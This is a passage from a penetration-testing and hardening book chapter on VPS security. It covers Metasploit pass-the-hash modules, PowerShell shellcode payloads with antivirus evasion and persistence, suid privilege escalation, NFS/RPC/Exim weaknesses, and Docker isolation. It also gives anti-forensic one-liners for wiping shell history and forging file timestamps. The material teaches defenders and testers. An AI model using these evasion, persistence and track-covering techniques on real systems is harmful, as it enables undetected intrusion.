If you have the necessary resources, that is knowledge, skill, experience, desire, money, and of course the need for high security which is becomming more and more important all the time, I usually advocate bringing VPS(s) in-house where you have more control. Most of my work around VPSs are with GNU/Linux instances. Most of the testing in this chapter was performed on Debian instances, usually, but not allways, web servers. Unless stated otherwise, the following applies to these type of instances.
Take results from higher level Asset Identification found in the 30,000’ View chapter of Fascicle 0. Remove any that are not applicable. Add any newly discovered. Here are some to get you started:
This is probably an incomplete list for your domain. I have given you a start. Put your thinking cap on and populate the rest, or come back to it as additional assets enter your mind.
Go through same process as we did at the top level in Fascicle 0, but for your VPS(s).
In terms of security, unless your provider is Swiss, you give up so much when you forfeit your system(s) to an external provider. I cover this in my talk “Does Your Cloud Solution Look Like a Mushroom”.
Windows exploitation is prevalent, easy and fun, because there is what seems to be a never ending source of security defects. I am not going to attempt to cover much, as I would be here for to long, and this book series is more focussed on giving you a broad understanding with examples as we go.
The problem is not so much that there is a never ending source of defects in Windows, but rather, that the platform was not designed with openness as a core attribute. Because of its closed nature, hardening the platform in many cases is very difficult and often comes down to applying band-aids over top of the defects rather than being able to remove them.
If you want a platform that you can have a decent level of control over its security, do not buy into closed offerings.
PsExec was written by Mark Russinovich as part of the Sysinternals tool suite. PsExec the tool allows you to execute programs on remote Windows systems without having to install anything on the server you want to manage or hack. Also being a Telnet replacement.
PsExec requires a few things on the target system:
There are several behavioural techniques, or targets as Metasploit calls them for the psexec
module. In this case we use the Native Upload Target, but using a custom compiled payload (set exe::custom
), you can see this in The Play below. What happens here is that our payload is embedded into a Windows Service executable within the PsExec executable, which it then deploys to the Admin$ share on the target machine. The DCE/RPC interface is then used over SMB to access the Windows Service Control Manager (SCM) API. PsExec then turns on its Windows Service on the target machine. This service then creates a named pipe which can be used to send commands to the system.
The Metasploit psxec
module (exploit/windows/smb/psexec
) uses basically the same principle. This was the first of the “Pass The Hash” suite of Metasploit modules, first committed on 2007-07-03
The following attack was the last of five that I demonstrated at WDCNZ in 2015. The previous demo of that series will provide some additional context and it is probably best to look at it first if you have not already.
You can find the video of how it is played out at http://youtu.be/1EvwwYiMrV4.
Just before the Synopsis, I mentioned that there were several behavioural techniques for the psexec
module. One of the other techniques, called “MOF Upload Target” is to use Managed Object Format (MOF) files which use the C++ syntax. These MOF files must be compiled and are then consumed by Windows Management Instrumentation (WMI). This works quite differently, psexec
does not execute anything, all it does is upload your executable to SYSTEM32
, and a MOF file to SYSTEM32\wbem\mof\
. When windows receives the event for the new MOF file, it compiles and executes it, which tells Windows to run the paylod in SYSTSEM32
. Metasploits MOF library only works with Windows XP and Server 2003. There is also the same high chance of getting sprung by AV, although you can carry out similar tricks as we did above to get around the AV signatures.
If you are running a penetration test for a client and your targets AV fires, then it could be game over for you. There are better options that exist now that are less likely to ring alarm bells with your target.
We have just detailed and demonstrated the first of the Metasploit PTH suite above. Kali Linux also has the “Pass the Hash toolkit” (with all tools prefixed with “pth-“). The following are the rest of the Metasploit PTH modules in order of when they were introduced. All of the PTH suite except psexec_ntdsgrab
depend on CVE-1999-0504. They also all make use of the PsExec utility except the last one wmi
. You will notice that some of these are exploits and some are technically auxiliary modules, as you read their descriptions, you will understand why.
current_user_psexec
exploit/windows/local/current_user_psexec
psexec
module, using a UNC path to the file on the victim system, this is essentially a pivot, or lateral movementYou are going to want to run ss to find out which system(s) if any, the administrator is connected to, ideally something important like a Domain Controller. From the victim, you can compromise many targets using the same administrators authentication token.
This is a local exploit, it has to be run from an already compromised administrator that you have a Meterpreter session on, a reverse shell for example, against your target, this is where the pivot occurs
psexec_command
auxiliary/admin/smb/psexec_command
This module passes the valid administrator credentials, then executes a single arbitrary Windows command on one or more target systems, using a similar technique to the PsExec utility provided by SysInternals. This will not trigger AV as no binaries are uploaded, we are simply leveraging cmd.exe. but it also does not provide a meterpreter shell. Concatenating commands with ‘&’ does not work
psexec_loggedin_users
auxiliary/scanner/smb/psexec_loggedin_users
This module passes the valid administrator credentials, then using a similar technique to that of the PsExec utility queries the HKU base registry key on the remote machine with reg.exe to get the list of currently logged in users. Notice this is a scanner module, so it can be run against many target machines concurrently
psexec_psh
exploit/windows/smb/psexec_psh
This module passes the valid administrator credentials as usual, then attempts to execute a powershell payload using a similar technique to the PsExec utility. This method is far less likely to be detected by AV because: PowerShell is native to Windows, each payload is unique because it is your script and it is just base64 encoded, more likely to escape signature based detection, it also never gets written to disk. It is executed from the commandline using the -encodedcommand
flag and provides the familiar Meterpreter shell
psexec_ntdsgrab
auxiliary/admin/smb/psexec_ntdsgrab
NTDS.dit
And SYSTEM Hive Download Utility”
Similar to SmbExec that we setup in the Tooling Setup chapter of Fascicle 0, this Metasploit module authenticates to an Active Directory Domain Controller and creates a volume shadow copy of the %SYSTEMDRIVE% using a native Windows tool “vssadmin” (visible in the source). It then pulls down copies of the NTDS.dit
file as well as the SYSTEM registry hive and stores them. The NTDS.dit
and SYSTEM registry hive copy can be used in combination with other tools for offline extraction of AD password hashes. All of this is done without uploading a single binary to the target host.
There are additional details around where NTDS.dit
fits into the picture in the Windows section of the Web Applications chapter.
Unlike SmbExec, we have to parse the files that psexec_ntdsgrab
downloads for us with a separate tool, also discussed briefly in the Windows section of the Web Applications chapter
wmi
exploit/windows/local/wmi
Before we cover the Metasploit module, let’s gain a little more understanding around what WMI is, when it was introduced, how wide spread its consumption is, etc.
Windows NT 4.0 (1996-07-29): During this time period, Microsoft released an out-of-band WMI implementation that could be downloaded and installed. Since then Microsoft has consistently added WMI providers.
WMI core components are present by default in all Windows OS versions from Windows 2000 and after. Previous Windows releases can run WMI, but the components have to be installed.
Windows Server 2008 included the minimalistic Server Core, smaller codebase, no GUI (less attack surface).
Windows Server 2012 added the ability to switch between GUI and Server Core.
Windows Server 2016 added Nano Server to the mix of options. Nano Server has what they call a minimal footprint and is headless. It excludes the local GUI, and all management is carried out via WMI, PowerShell, and Remote Server Management Tools (a collection of web-based GUI and command line tools). In Technical Preview 5 (2016-04-17), the ability to manage locally using PowerShell was added. So we see the continued commitment to support these tools going forward, so they will continue to be excellent attack vectors and play an important part in the attackers toolbox and attack surface.
WMI Providers provide interfaces for configuring and monitoring Windows services, along with programming interfaces for consumption via custom built tools.
WMI needs to be accessible for remote access, of which there are step(s) to make sure this is the case. These step(s), vary depending according to the specific Windows release and other configurations.
Rather than relying on SMB via the psexec technique, starting a service on the target, the wmi
module executes PowerShell on the target using the current user credentials or those that you supply, so this is still a PTH technique. We use the WMI Command-line (WMIC) to start a Remote Procedure Call on TCP port 135 and an ephemeral port. Then create a ReverseListenerComm to tunnel traffic through that session
By default, PowerShell is installed on Windows Server 2008 R2 and Windows 7 onwards.
PowerShell “is going to be on all boxes and it going provide access to everything on the box” This is excellent news for penetration testers and other attackers!
On Windows Server from PowerShell 4.0 onwards (Windows 8.1, Server 2012 R2), the default execution policy is RemoteSigned, but that is easily overridden in a script as you will see soon. We:
Then you just need to get some code run on your targets machine. There are many ways to achieve this. Off the top of my head:
Metasploit or setoolkit generating office files or pdfs usually trigger AV, but this is much easier to get around with PowerShell.
Traditionally the payload would have to be saved to the targets file system, but with PowerShell and other scripting languages, the payload can remain in memory, this defeats many AV products along with HIDS/HIPS. AV vendors continue to get better at detecting malware that is compiled to native assembly, but they struggle to interpret the intent of scripts, as it is so easy to make changes to the script, but keep the script intent doing the same thing. To make matters worse, PowerShell is tightly integrated now with the Windows Operating Systems.
So what we are doing is making our viruses and payloads look like chameleons or business as usual (BAU), to detection mechanisms.
Meterpreter is an excellent platform for attacking with. It provides us with many useful tools which make tasks like privilege escalation, establishing persistence, lateral movement, pivoting, and others, much easier.
The shellcodes available in psmsf
are the following msfvenom
payloads, of which the second one we use in this play:
windows/shell/reverse_tcp
windows/meterpreter/reverse_tcp
windows/meterpreter/reverse_http
You can find the video of how this attack is played out at https://youtu.be/a01IJzqYD8I.
If you do not already have psmsf
on your attack machine, go ahead and clone it as discussed in the Tooling Setup chapter of Fascicle 0.
When psmsf
is run as per above, the Metasploit windows/meterpreter/reverse_tcp
shellcode is generated by running msfvenom
programmatically as the following:
psmsf
then takes the generated output and in a function called extract_msf_shellcode
strips out the characters that do not actually form part of the raw shellcode, like an assignment to a char array, double quotes, new lines, semicolons, white space, etc, and just leaves the raw shellcode.
psmsf
then replaces any instances of \x
with 0x
.
psmsf
then passes the cleaned up reverse_tcp
shellcode to a function called generate_powershell_script
that embeds it into a PowerShell script that is going to become the main part of our payload.
That code looks like the following, I have added the annotations to help you understand how it works:
is psmsf licensed with BSD License.
The powershell_hacking.bat
that we copy to our web hosting directory as payload.txt
, is the result of the content referenced by the above returned reference to the shellcode variable after it has been utf_16_le
encoded then base 64 encoded. This occurs in the generate_powershell_command
as follows:
After working with PowerShell exploitation for a few weeks, what quickly becomes apparent is how powerful, easy and effective exploitation and post-exploitation is with the PowerShell medium. There are many tools and modules available to use, often some will not quite work, then you will find a similar variant that someone has taken and improved that does the job adequately. For example, the attack I just demonstrated was based on the Trustedsec unicorn.py which did not quite work for me. Then upstream of unicorn is Invoke-Shellcode.ps1 of the PowerShellMafia PowerSploit project, which looks to be in good shape. Matt Graeber’s technique of injecting a given shellcode into the running instance of PowerShell is the common theme running through the PowerShell shellcode injection exploits used in a number of projects. Matt blog posted on this technique in 2011 which is very similar to what we just used above with Psmsf. The landscape is very fluid, but there are always options and usually without requiring any code modifications.
The Veil-Framework’s Veil-Evasion has a similar set of payloads that @harmj0y blog posted on. Kevin Dick also wrote a decent blog post on these.
Problems with the other payloads
When I tested the payload generated by version 7.4.3 of setoolkit
:
1) Social Engineering Attacks
-> 9) Powershell Attack Vectors
-> 1) Powershell Alphanumeric Shellcode Injector
, it did not work, this may have been fixed in a later version.
Running an executable or convincing your target to run it works in many cases, but other options like office documents can work well also. Nishang is a framework and collection of scripts and payloads that empower us to use PowerShell for all phases of penetration testing. Amongst the many goodies in Nishang is a collection of scripts which can create office documents such as Word, Excel, CHM and a handful of others.
I have not provided a video with this play as it is very similar to the previous one.
If you do not already have nishang
on your Windows attack machine, go ahead and clone it as discussed in the Tooling Setup chapter of Fascicle 0.
Metasploit had a Meterpreter script called persistence.rb
that could create a persistent (survive reboots, and most other actions a user will take) reverse shell, these scripts are no longer supported. If you try to use it, you will probably get an error like: “windows version of Meterpreter is not supported with this Script
”
Now the exploit/windows/local/persistence
module is recommended for persistence. AV picks this up on reboot though, so you probably will not get far with this.
We can do better than meterpreter
. PowerSploit has a module called Persistence, and that is what we use in this play. This adds persistence to the PowerShell one liner that was embedded in the psmsf
virus we created above, namely download-payload-execute
, and also used in the office document attack with nishang
. The one liner was:
I had a play with the nishang
Add-Persistence.ps1
script, which may be useful for creating post-exploitation persistence, but I was looking for a solution to create an atomic persistent exploit, which is what PowerSploit provides.
You can find the video of how this attack is played out at https://youtu.be/al9RX40QuXU.
If you do not already have PowerSploit
on your Windows attack machine, go ahead and clone it as discussed in the Tooling Setup chapter of Fascicle 0.
The PowerSploit Persistence module offers the following persistence techniques:
At the following stages:
AtLogon
AtStartup
OnIdle
Daily
Hourly
(as we have just seen)At
(specify specific times)There are many ways to achieve persistence. I have not included any lateral movement or privilege escalation amongst these PowerShell plays, but feel free to take your post exploitation further. Even the tools we have used in these plays have a good variety of both.
A lack of segmenting of a file system, according to what is the least amount of privilege any authorised parties require is often the precursor to privilege escalation.
Privileged services that are started on system boot by your init system (as discussed under the Proactive Monitoring section) often run other executable files whether they be binaries or scripts.
When an executable (usually run as a daemon) is called by one of these privileged services and is itself writeable by a low privileged user, then a malicious actor can swap the legitimate executable for a trojanised replica, or even just a malicious executable if they think it will go unnoticed.
If we take the path of least resistance when setting up our partitions on installation by combining file system resources that have lesser requirements for higher privileges, together with those that have greater requirements, then we are not applying the principle of least privilege. What this means is that some resources that do not need the extra privileges in order to do their job, get given them anyway. This allows attackers to take advantage of this, by swapping in (writing) and executing malicious files, directly or indirectly.
If the target file that an attacker wants to swap for a trojanised version is world writeable, user writeable or even group writeable, and they are that user or in the specified group, then they will be able to swap the file… Unless the mounted file system is restrictive enough to mitigate the action.
unix-privesc-check
single file), which is fine, but the later version which sits on the master branch (upc.sh
main file plus many sub files) does a lot more, so it can be good to use both. You just need to get the shell file(s) from either the 1_x
or master
branch onto your target machine and run. Running as root allows the testing to be a lot more thorough for obvious reasons. If I’m testing my own host, I will start with the upc.sh
, I like to test as a non root user first, as that is the most realistic in terms of how an attacker would use it. Simply looking at the main file will give you a good idea of the options, or you can just run:./upc.sh -h
To run:
# Produces a reasonably nice output
./upc.sh > upc.output
mount
noexec
as specified in /etc/fstab
and attempt to run it, it should fail.ro
(read-only) option specified against them in the /etc/fstab
, that should also fail.nosuid
option to your mounts prevents the suid
(Set owner User ID) bit on executables from being respected. If for example we have an executable that has its suid
bit set, any other logged in user temporarily inherits the file owners permissions as well as the UID and GID to run that file, rather than their own permissions.Running a directory listing that has a file with its suid
bit set will produce a permission string similar to -rwsr--r--
The s
is in the place of the owners executable bit. If instead a capitol S
is used, it means that the file is not executable
All suid
files can be found with the following command:
find / -perm -4000 -type f 2>/dev/null
All suid
files owned by root can be found with the following command:
find / -uid 0 -perm -4000 -type f 2>/dev/null
To add the suid
bit, you can do so the symbolic way or numeric.
symbolic:
chmod u+s <yourfile>
numeric:
chmod 4750 <yourfile>
This adds the suid
bit, read, write and execute for owner
, read and execute for group
and no permissions for other
. This is just to give you an idea of the relevance of the 4
in the above -4000
, do not go setting the suid
bits on files unless you fully understand what you are doing, and have good reason to. This could introduce a security flaw, and if the file is owned by root, you may have just added a perfect vulnerability for an attacker to elevate their privileges to root due to a defect in your executable or the fact that the file can be modified/replaced.
So for example if root owns a file and the file has its suid
bit set, anyone can run that file as root.
We will now walk through the steps of how an attacker may carry out a privilege escalation.
You can find the video of how it is played out at https://youtu.be/ORey5Zmnmxo.
The Countermeasures sections that address are:
This same concept was covered in the People chapter of Fascicle 0, which also applies to VPS. In addition to that, the risks are addressed within the countermeasures section.
Allowing root logins is a lost opportunity for another layer of defence in depth, where the user must elevate privilages before performaning any task that could possibly negativly impact the system. Once an attacker is root on a system, the system is owned by them. Root is a user and no guess work is required for that username. Other low privilaged users require some guess work on the part of the username as well as the password, and even once both parts of a low privaleged credential have been aquired, there is another step to total system ownership.
You may remember we did some fingerprinting of the SSH daemon in the Reconnaissance section of the Processes and Practises chapter in Fascicle 0. SSH in itself has been proven to be solid. In saying that, SSH is only as strong as the weakest link involved. For example, if you are using the default of password authentication and have not configured which remote hosts can or can not access the server, and chose to use a weak password, then your SSH security is only as strong as the password. There are many configurations that a default install of SSH uses in order to get up and running quickly, that need to be modified in order to harden SSH. Using SSH in this manner can be convienient initially, but it is always recommended to move from the defaults to a more secure model of usage. I cover many techniques for configuring and hardening SSH in the SSH Countermeasures section.
Being able to boot from alternative media to that of your standard OS, provides additional opportunity for an attacker to install a root-kit on your machine, whether it be virtual or real media.
An attacker can probe the Open Network Computing Remote Procedure Call (ONC RPC) port mapper service on the target host, where the target host is an IP address or a host name.
If installed, the rpcinfo
command with -p
will list all RPC programs (such as quotad
, nfs
, nlockmgr
, mountd
, status
, etc) registered with the port mapper (whether the depricated portmap
or the newer rpcbind
). Many RPC programs are vulnerable to a collection of attacks.
This provides a list of RPC services running that have registered with the port mapper, thus providing an attacker with a lot of useful information to take into the Vulnerability Searching stage discussed in the Process and Practises chapter of Fascicle 0.
The deprecated portmap
service as well as the newer rpcbind
, listen on port 111 for requesting clients, some Unix and Solaris versions will also listen on ports above 32770.
Besides providing the details of RPC services, portmap
and rpcbind
are inherently vulnerable to DoS attacks, specifically reflection and amplification attacks, in fact that is why. Clients make a request and the port mapper will respond with all the RPC servers that have registered with it, thus the response is many times larger than the request. This serves as an excellent vector for DoS, saturating the network with amplified responses.
These types of attacks have become very popular amongst distributed attackers due to their significant impact, lack of sophistication and ease of execution. Level 3 Threat Research Labs published a blog post on this port mapper DoS attack and how it has become very popular since the beginning of August 2015.
US-CERT also published an alert on UDP-Based Amplification Attacks outlining the Protocols, Bandwidth Amplification Factor, etc.
You will notice in the response as recorded by Wireshark, that the length is many times larger than the request, 726 bytes in this case, hence the reflected amplification:
The packet capture in Wireshark which is not showen here also confirms that it is UDP.
Exim, along with offerings such as Postfix, Sendmail, Qmail, etc, are Mail Transfer Agents (MTAs), which on a web server are probably not required.
There have been plenty of exploits created for Exim security defects. Most of the defects I have seen have patches for, so if Exim is a necessity, stay up to date with your patching. If you are still on a stable (jessie at the time of writing) and can not update to a testing release, make sure to use backports.
At the time of writing this, the very front page of the Exim website states “All versions of Exim previous to version 4.87 are now obsolete and everyone is very strongly recommended to upgrade to a current release.”.
Jessie (stable) uses Exim 4.84.2 where as jessie-backports uses Exim 4.87,
which 4.86.2 was patched for the likes of CVE-2016-1531. Now if we have a look at the first exploit for this vulnerability (https://www.exploit-db.com/exploits/39535/) and dissect it a little:
The Perl shell environment variable $PERL5OPT
can be assigned options, these options will be interpreted as if they were on the #!
line at the beginning of the script. These options will be treated as part of the command run, after any optional switches included on the command line are accepted.
-M
, which is one of the allowed switches (-
[DIMUdmw
]) to be used with $PERL5OPT
allows us to attempt to use a module from the command line, so with -Mroot
we are trying to use the root
module, then PERL5OPT=-Mroot
effectively puts -Mroot
on the first line like the following, which runs the script as root:
#!perl -Mroot
The Perl shell environment variable $PERL5LIB
is used to specify a colon (or semicolon on Windows) separated list of directories in which to look for Perl library files before looking in the standard library and the current directory.
Assigning /tmp
to $PERL5LIB
immediately before the exploit is run, means the first place execution will look for the root module is in the /tmp
directory.
Some History:
NIS+ was introduced as part of Solaris 2 in 1992 with the intention that it would eventually replace Network Information Service (NIS), originally known as Yellow Pages (YP). NIS+ featured stronger security, authentication, greater scalability and flexibility, but it was more difficult to set up, administer and migrate to, so many users stuck with NIS. NIS+ was removed from Solaris 11 at the end of 2012. Other more secure distributed directory systems such as Lightweight Directory Access Protocol (LDAP) have come to replace NIS(+).
What NIS is:
NIS is a Remote Procedure CAll (RPC) client/server system and a protocol providing a directory service, letting many machines in a network share a common set of configuration files with the same account information, such as the commonly local stored UNIX:
/etc/passwd
and referenced /etc/shadow
which contains the hashed passwords, discussed in detail under the Review Password Strategies sectionThe NIS master server maintains canonical database files called maps. We also have slave servers which have copies of these maps. Slave servers are notified by the master via the yppush
program when any changes to the maps occur. The slaves then retrieve the changes from the master in order to synchronise their own maps. The NIS clients always communicate directly with the master, or a slave if the master is down or slow. Both master and slave(s) service all client requests through ypserv
.
Vulnerabilities and exploits:
NIS has had its day, it is vulnerable to many exploits, such as DoS attacks using the finger service against multiple clients, buffer overflows in libnasl,
“lax authentication while querying of NIS maps (easy for a compromised client to take advantage of), as well as the various daemons each having their own individual issues. Not to mention that misconfiguration of NIS or netgroups can also provide easy holes that can be exploited. NIS databases can also be easily accessed by someone who doesn’t belong on your network. How? They simply can guess the name of your NIS domain, bind their client to that domain, and run a ypcat command to get the information they are after.”
NIS can run on unprivileged ports, which means that any user on the system(s) can run them. If a replacement version of these daemons was put in place of the original, then the attacker would have access to the resources that the daemons control.
rpcbind
listens on the same port(s) as the deprecated portmap
and suffers the same types of DoS attacks.
Provides a command line interface on a remote server via its application layer client-server protocol traditionally to port 23. Telnet was created and launched in 1969, provides no encryption, credentials are sent in plain text. There have been extensions to the Telnet protocol which provide Transport Layer Security (TLS) and Simple Authentication and Security Layer (SASL), many Telnet implementations do not support these though.
Telnet is still provided turned on, on many cheap hardware appliances, which continue to provide an excellent source of ownable resources for those looking to acquire computing devices illegally to launch attacks from. Many of these devices also never have their default credentials changed.
The FTP protocol was not designed with security in mind, it does not use any form of encryption. The credentials you use to authenticate, all of your traffic including any sensitive information you have in the files that you send or receive, to or from the FTP server, will all be on the wire in plain text. Even if you think your files do not contain any sensitive information, often there will be details hiding, for example, if you are [m]put
ting / [m]get
ing source files, there could be database credentials or other useful bits of information in config files.
Many people have been using FTP for years, in many cases never even considering the fact that FTP adds no privacy to anything it touches.
Most FTP clients also store the users credentials in plain text, completely neglecting to consider defence in depth. It should be considered that your client machine is already compromised. If credentials are stored encrypted, then it is one more challenge that an attacker must conquer. All software created with security in mind realises this, and if they must store credentials, they will be hashed via a best of bread KDF (as discussed in the Data-store Compromise section of the Web Applications chapter) with the recommended number of iterations (as discussed in the Review Password Strategies section a little later in this chapter). In regards to FTP, the clients are designed to store multiple credentials, one set for each site, the idea being that you don’t have to remember them, so they need to be encrypted, rather than hashed (one way, not reversible), so they can be decrypted.
A couple of the most popular clients are:
FileZilla (cross platform) FTP client stores your credentials in plain text. Yes, the UI conceals your password from shoulder surfers, but that is the extent of its security, basically none.
WinSCP (Windows) is a FTP, SFTP and SCP client for Windows. WinSCP has a number of ways in which you can have it deal with passwords. By default, when a user enters their password on the authentication window, it is stored in memory and reused for all subsequent authentications during the same session. This is of course open to exploitation as is, also in-memory data can be swapped to disk, written to crash dump files and accessed by malware.
Another option is to store passwords along with other site specific configurations to the registry for installed WinSCP, or to an INI file (overridable) for the portable version. These passwords are stored obfuscated, as the documentation puts it “stored in a manner that they can easily be recovered”. If you are interested, you can check the EncryptPassword
function on the WinSCP github mirror, in which a short and simple set of bitwise operations are performed on each character of the password and the user and host are concatenated as what looks to be some sort of pseudo-salt. Although this option exists, it is recommended against.
And here is why. The exploit decrypt_password
consumed by the winscp
metasploit module. Additional details on the cosine-security blog.
The recommended way to store the site specific passwords is to use a Master Password. This appears to use a custom implementation of the AES256 block cipher, with a hard-coded 1000 rounds of SHA1.
WinSCP provides a lot of options, which may or may not be a good thing.
mountd
or rpc.mount
is the NFS mount daemon, that listens and services NFS client requests to mount a file system.
If mounts are listed in the /etc/fstab
, attempts will be made to mount them on system boot.
If the mountd
daemon is listed in the output of the above rpcinfo
command, the showmount -e
command will be useful for listing the NFS servers list of exports defined in the servers /etc/exports
file.
NFS is one of those protocols that you need to have some understanding on in order to achieve a level of security sufficient for your target environment. NFS provides no user authentication, only host based authentication. NFS relies on the AUTH_UNIX method of authentication, the user ID (UID) and group ID (GIDs) that the NFS client passes to the server are implicitly trusted.
All going well for the attacker, they will now have your VPS’s /
directory mounted to their /mnt
directory. If you have not setup NFS properly, they will have full access to your entire file system.
To establish some persistence, an attacker may be able to add their SSH public key:
The NFS daemon always listens on the unprivileged port 2049. An attacker without root privileges on a system can start a trojanised nfsd
which will be bound to port 2049.
nfsd
and run their own, clients may communicate with the trojanised nfsd
and possibly consume similar exports. By replacing a NFS daemon with a trojanised replica, the attacker would also have access to the resources that the legitimate daemon controls.The ports that a Linux server will bind its daemons to are listed in /etc/services
.
As well as various privilege escalation vulnerabilities, NFS has also suffered from various buffer overflow vulnerabilities.
As I was writing this section, I realised that visibility is actually an asset, so I went back and added it… actually to several chapters. Without visibility, an attacker can do a lot more damage than they could if you were watching them and able to react, or even if you have good auditing capabilities. It is in fact an asset that attackers often try and remove for this very reason.
Any attacker worth their weight will try to cover their tracks as they progress. Once an attacker has shell access to a system, they may:
ln /dev/null ~/.bash_history -sf
so that all following history vanishes.touch -r <referenceFile> <fileThatGetsReferenceFileTimeStampsApplied>
md5sum
so that it contains sums for the files that were replaced including itself. Although if an administrator ran rpm -V
or debsums -c
(Debian, Ubuntu) it would not be affected by a modified md5sum
.If an attacker wants their actions to be invisible, they may try replacing the likes of ps
, pstree
, top
, ls
and possibly netstat
or ss
, and/or many other tools that reveal information about the system, if they are trying to hide network activity from the host.
Taking things further, an attacker may load a kernel module that modifies the readdir()
call and the proc
filesystem so that any changes on the file system are untrustworthy, or if going to the length of loading custom modules, everything can be done from kernel space which is invisible until reboot.
Without visibility, an attacker can access your system(s) and, alter, copy, modify information without you knowing they did it. Even launch DoS attacks without you noticing anything before it is to late.
With the continual push for shorter development cycles, combined with continuous delivery, cloud and virtual based infrastructure, containers have become an important part of the continuous delivery pipeline. Docker has established itself as a top contender in this space.
Many of Dockers defaults favour ease of use over security, in saying that, Docker’s security considerations follow closely. After working with Docker, the research I have performed in writing these sections on Docker security, and in having the chance to discuss many of my concerns and preconceived ideas with the Docker Security team lead Diogo Mónica over this period, it is my belief that by default Docker containers, infrastructure and orchestration provide better security than running your applications in Virtual Machines (VMs). Just be careful when comparing containers with VMs, as this is analogous with comparing apples with oranges.
The beauty in terms of security that Docker provides is immense configurability to improve the security many times more than the defaults. In order to do this, you will have to invest some time and effort into learning about the possible issues, features and how to configure them. It is this visibility that I have attempted to create in these sections on Docker security.
Docker security is similar to VPS security, except there is a much larger attack surface, due to running many containers with many different packages, many of which do not receive timely security updates, as noted by banyan and the morning paper.
A monolithic kernel such as the Linux kernel, containing tens of millions of lines of code, which are reachable from untrusted applications via all sorts of networking, USB, driver APIs Has a huge attack surface. Adding Docker into the mix has the potential to expose all these vulnerabilities to each and every running container, and its applications within, thus making the attack surface of the kernel grow exponentially.
Docker leverage’s many features that have been in the Linux kernel for years, which provide a lot of security enhancements out of the box. The Docker Security Team are working hard to add additional tooling and techniques to further harden their components, this has become obvious as I have investigated many of them. You still need to know what all the features, tooling and techniques are, and how to use them, in order to determine whether your container security is adequate for your needs.
From the Docker overview, it says: “Docker provides the ability to package and run an application in a loosely isolated environment”. Later in the same document it says: “Each container is an isolated and secure application platform, but can be given access to resources running in a different host or container” leaving the “loosely” out. Then it goes on to say: “Encapsulate your applications (and supporting components) into Docker containers”. The meaning of encapsulate is to enclose, but If we are only loosely isolating, then we’re not really enclosing are we? I will address this concern in the following Docker sections and subsections.
To start with, I am going to discuss many areas where we can improve container security, then at the end of this Docker section I will discuss why application security is far more of a concern than container security.
Similar to Consuming Free and Open Source from the Web Applications chapter, many of us trust the images on docker hub without much consideration to the possible defective packages within. There have been quite a few reports with varying numbers of vulnerable images as noted by Banyan and “the morning paper” mentioned above.
The Docker Registry project is an open-source server side application that lets you store and distribute Docker images. You could run your own registry as part of your organisations Continuous Integration (CI) / Continuous Delivery (CD) pipeline. Some of the public known instances of the registry are:
Beware of doppelganger images that will be available for all to consume, similar to doppelganger packages that we discuss in the Web Applications chapter. These can contain a huge number of packages and code to hide malware in a Docker image.
What is worse, dockers default is to run containers, and all commands / processes within a container as root. This can be seen by running the following command from the CIS_Docker_1.13.0_Benchmark:
If you have two containers running and the user has not been specified you will see something like the below, which means your two containers are running as root.
Images derived from other images inherit the same user defined in the parent image explicitly or implicitly, so unless the image creator has specifically defined a non root user, the user will default to root. That means, all processes within the container will run as root.
Considering these processes run as root, and have indirect access to most of the Linux Kernel (20+ million lines of code written by humans) APIs such as networking, USB, storage stacks, and others via System calls, the situation may look bleak.
System calls are how programmes access the kernel to perform tasks. This attack surface is huge, and all before any security is added on top in the form of LXC, or libcontainer (now opencontainers/runc), or Linux Security Modules (LSM) such as AppArmor or SELinux, which are often seen as an annoyance and just disabled like many other forms of security.
If you run a container, you may have to install kmod
, then run lsmod
in the container and also on the host system, you will see that the same modules are loaded, this is because as mentioned, the container shares the host kernel, so there is not a lot between processes within the container and the host kernel, and considering as mentioned above, the processes within the container may be running as root also, it will pay for you to get a good understanding of the security features Docker provides and how to employ them.
The Seccomp section below discusses Dockers attempt to put a stop to some System calls accessing the kernel APIs. There are also many other features that Docker has added or leveraged in terms of mitigating a lot of this potential abuse. So although the situation initially looks bad, Docker has done a lot to improve it.
As you can see in the above image, the host kernel is open to receiving potential abuse from containers. Make sure you keep it patched. We will now walk though many areas of potential abuse. The countermeasures sections offer information, advice, and techniques for further improving Docker security.
The first place to read for solid background on Linux kernel namespaces is the man-page, otherwise I would just have to repeat what is there. A lot of what is to follow around namespaces requires some knowledge from the namespaces man-page, so do your self a favour and read it first.
Linux kernel namespaces started to be added between 2.6.15 (January 2006) and 2.6.26 (July 2008)
According to the namespaces man page, IPC, network and UTS namespace support was available from kernel version 3.0, mount, PID and user namespace support was available from kernel version 3.8 (February 2013), cgroup namespace support was available from kernel version 4.6 (May 2016).
Each aspect of a container runs in a separate namespace and its access is limited to that namespace.
Docker leverage’s the Linux (kernel) namespaces which provide an isolated workspace which wraps a global system resource abstraction that makes it appear to the processes within the namespace that they have their own isolated instance of the global resource. When a container is run, Docker creates a set of namespaces for that container, providing a layer of isolation between containers:
mnt
: (Mount) Provides filesystem isolation by managing filesystems and mount points. The mnt
namespace allows a container to have its own isolated set of mounted filesystems, the propagation modes can be one of the following: [r
]shared
, [r
]slave
or [r
]private
. The r
means recursive.
If you run the following command, then the hosts mounted host-path
is shared with all others that mount host-path
. Any changes made to the mounted data will be propagated to those that use the shared
mode propagation. Using slave
means only the master (host-path
) is able to propagate changes, not vice-versa. Using private
which is the default, will ensure no changes can be propagated.
If you omit the host-path
you can see the host path that was mounted by running the following command:
Find the “Mounts” property in the JSON produced. It will have a “Source” and “Destination” similar to:
An empty string for Mode means it is set to its default of read-write. This means for example that a container can mount sensitive host system directories such as /
, /boot
, /etc
(as seen in Review Password Strategies), /lib
, /proc
, /sys
, along with the rest discussed in the Lock Down the Mounting of Partitions section, if that advice was not followed, if it was you have some defence in depth working for you, and although Docker may have mounted a directory as read-write, the underlying mount may be read-only, thus stopping the container from being able to modify files in these locations on the host system. If the host does not have the above directories mounted with constrained permissions, then we are relying on the user that runs any given Docker container mounting a sensitive host volume to mount it as read-only. For example, after the following command has been run, users within the container can modify files in the hosts /etc
directory:
Also keep in mind that by default the user in the container unless otherwise specified is root, and that is the same root user that is on the host system.
Labelling systems such as Linux Security Modules (LSM) require that the contents of a volume mounted into a container be labelled. This can be done by adding the z
(as seen in above example) or Z
suffix to the volume mount. The z
suffix instructs Docker that you intend to share the mounted volume with other containers, and in doing so, Docker applies a shared content label. Alternatively if you provide the Z
suffix, Docker applies a private unshared label, which means only the current container can use the mounted volume. Further details can be found at the dockervolumes documentation. This is something to keep in mind if you are using LSM and have a process inside your container that is unable to use the mounted data.
--volumes-from
allows you to specify a data volume from another container.
You can also mount your Docker container mounts on the host by doing the following:
PID
